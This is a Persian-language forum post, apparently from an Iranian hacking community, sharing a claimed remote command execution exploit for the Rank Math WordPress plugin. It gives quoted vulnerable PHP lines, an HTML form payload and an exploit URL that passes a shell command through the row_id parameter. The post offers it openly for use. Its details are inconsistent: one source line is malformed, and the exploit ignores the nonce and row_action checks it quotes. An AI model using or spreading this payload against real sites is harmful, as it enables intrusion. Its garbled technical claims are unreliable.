discord icon
سرور دیسکورد گاردایران

پست های پیشنهاد شده

یه اکسپلوت جدید برای wordpress میزارم براتون 

[-] Title  : Wordpress Plugin Rank Math v1.0.52.1 - Remote Command Execution
[-] Author : MR.MSA
[-] Vendor : https://wordpress.org/plugins/seo-by-rank-math
[-] Category : Webapps
[-] Date : 2020-11-10

Vulnerable Page:
/ActionScheduler_Abstract_ListTable.php


Vulnerable Source:
  541: $method $method($_REQUEST['row_id']); 
  538: $method = 'row_action_' . $_REQUEST['row_action']; 
     requires:
  540: if($_REQUEST['nonce'] === wp_create_nonce($_REQUEST['row_action'] . '::' . $_REQUEST['row_id']) && method_exists($this, $method))
  530: ⇓ function process_row_actions()

Exploit Code:
<html>
<form action="http://localhost/vendor/woocommerce/action-scheduler/classes/abstracts/ActionScheduler_Abstract_ListTable.php" method="GET">
<input name="row_id" type="text">
<input type="submit" value="RCE!" >
</form>
</html>


Exploit URL:
http://localhost/vendor/woocommerce/action-scheduler/classes/abstracts/ActionScheduler_Abstract_ListTable.php?row_id=ls

********************************************************* 
* Discovered By MR.MSA
* Telegram: @mr_msa7
* Discord: MR.MSA#3736
********************************************************* 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری